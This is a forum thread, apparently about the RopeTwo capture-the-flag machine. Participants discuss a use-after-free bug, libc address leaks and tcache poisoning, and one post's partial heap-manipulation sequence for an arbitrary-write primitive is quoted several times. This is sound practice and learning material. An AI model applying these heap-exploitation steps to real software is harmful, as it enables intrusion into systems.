TUTORIAL RopeTwo
by Doop3r - December 05, 2020 at 06:50 PM
#13
(December 14, 2020 at 06:18 PM)biggy7 Wrote:
(December 14, 2020 at 07:58 AM)teksius Wrote:
(December 13, 2020 at 04:36 PM)biggy7 Wrote:
(December 06, 2020 at 08:12 PM)teksius Wrote:
(December 06, 2020 at 06:51 PM)mandoline Wrote: I'm not sure, but I think that there is a use-after-free by adding a file and then editing it with a size of 0. But no idea how to proceed.

The main question is how to leak the libc address. Those who know the answer, please just say: which function do we need to dig into? Or do we need to go blind/brute-force?
I don't know how to leak libc, but did you get an arbitrary write primitive?
I can't get past the 2-mallocs limitation to finish poisoning the tcache.
Any ideas on how to achieve it?
Yes, you can do it like this:

# Addr to 1st chunk
add('B', 20, 'AAAA')
edit('B', 0, "A")
edit('B', 20, TARGET)
add('A', 20, 'AAAAA')
edit('B', 100, 'AAA')
rm('B')

edit('A', 112, 'AAAA')
rm('A')

#Addr to 2nd chunk
add('A', 30, 'AAAA')
edit('A', 0, "A")
edit('A', 30, TARGET)
add('B', 30, 'AAAA')
edit('B', 50, 'AAAA')
rm('B')

edit('A', 70, 'AAAA')
rm('A')

#Write the value
add('A', 40, VALUE)
Thanks!
What is the goal of making 2 targets?
Actually, there's no need for the 2nd target if you're not planning to use it in the future. This code is far from a real exploit. The main question you need to concentrate on is how to leak the libc address. If you manage that, the rest is simple.
#14
(December 14, 2020 at 07:58 AM)teksius Wrote:
(December 13, 2020 at 04:36 PM)biggy7 Wrote:
(December 06, 2020 at 08:12 PM)teksius Wrote:
(December 06, 2020 at 06:51 PM)mandoline Wrote:
(December 06, 2020 at 06:41 PM)teksius Wrote: Yep, I'm at the same point! Can't see any overflows there... Any nudges, guys?

I'm not sure, but I think that there is a use-after-free by adding a file and then editing it with a size of 0. But no idea how to proceed.

The main question is how to leak the libc address. Those who know the answer, please just say: which function do we need to dig into? Or do we need to go blind/brute-force?
I don't know how to leak libc, but did you get an arbitrary write primitive?
I can't get past the 2-mallocs limitation to finish poisoning the tcache.
Any ideas on how to achieve it?
Yes, you can do it like this:

# Addr to 1st chunk
add('B', 20, 'AAAA')
edit('B', 0, "A")
edit('B', 20, TARGET)
add('A', 20, 'AAAAA')
edit('B', 100, 'AAA')
rm('B')

edit('A', 112, 'AAAA')
rm('A')

#Addr to 2nd chunk
add('A', 30, 'AAAA')
edit('A', 0, "A")
edit('A', 30, TARGET)
add('B', 30, 'AAAA')
edit('B', 50, 'AAAA')
rm('B')

edit('A', 70, 'AAAA')
rm('A')

#Write the value
add('A', 40, VALUE)
I don't get the idea, can you share a little more please?
#15
I did user also. But the kernel part on the root is driving me nuts.
#16
Can someone share the script for user?
#17
(December 15, 2020 at 07:44 PM)teksius Wrote:
(December 14, 2020 at 06:18 PM)biggy7 Wrote:
(December 14, 2020 at 07:58 AM)teksius Wrote:
(December 13, 2020 at 04:36 PM)biggy7 Wrote:
(December 06, 2020 at 08:12 PM)teksius Wrote: The main question is how to leak the libc address. Those who know the answer, please just say: which function do we need to dig into? Or do we need to go blind/brute-force?
I don't know how to leak libc, but did you get an arbitrary write primitive?
I can't get past the 2-mallocs limitation to finish poisoning the tcache.
Any ideas on how to achieve it?
Yes, you can do it like this:

# Addr to 1st chunk
add('B', 20, 'AAAA')
edit('B', 0, "A")
edit('B', 20, TARGET)
add('A', 20, 'AAAAA')
edit('B', 100, 'AAA')
rm('B')

edit('A', 112, 'AAAA')
rm('A')

#Addr to 2nd chunk
add('A', 30, 'AAAA')
edit('A', 0, "A")
edit('A', 30, TARGET)
add('B', 30, 'AAAA')
edit('B', 50, 'AAAA')
rm('B')

edit('A', 70, 'AAAA')
rm('A')

#Write the value
add('A', 40, VALUE)
Thanks!
What is the goal of making 2 targets?
Actually, there's no need for the 2nd target if you're not planning to use it in the future. This code is far from a real exploit. The main question you need to concentrate on is how to leak the libc address. If you manage that, the rest is simple.
Given that the root exploit's shared, what is the leak trick? Did you create a fake non-tcache chunk?
#18
Hi, can someone help me with the script please? I want to understand how it works. Can someone share the script?
#19
(December 30, 2020 at 07:38 PM)ARhOmOuTEd Wrote: Hi, can someone help me with the script please? I want to understand how it works. Can someone share the script?
Which script? Can you elaborate on what you want?
#20
(December 31, 2020 at 05:36 AM)terobau Wrote:
(December 30, 2020 at 07:38 PM)ARhOmOuTEd Wrote: Hi, can someone help me with the script please? I want to understand how it works. Can someone share the script?
Which script? Can you elaborate on what you want?

He means the script to pwn r4j,

the UAF exploitation.

Rop2 is gonna retire soon,

so can you release that now as a New Year gift :D

*) Script to pwn r4j
*) Script to exploit the ralloc kernel

Or a writeup would be even better :D

Thanks in advance and Happy New Year :)
#21
Bumping - did someone release a walkthrough/solution for this a few weeks ago? There was a massive spike in owns.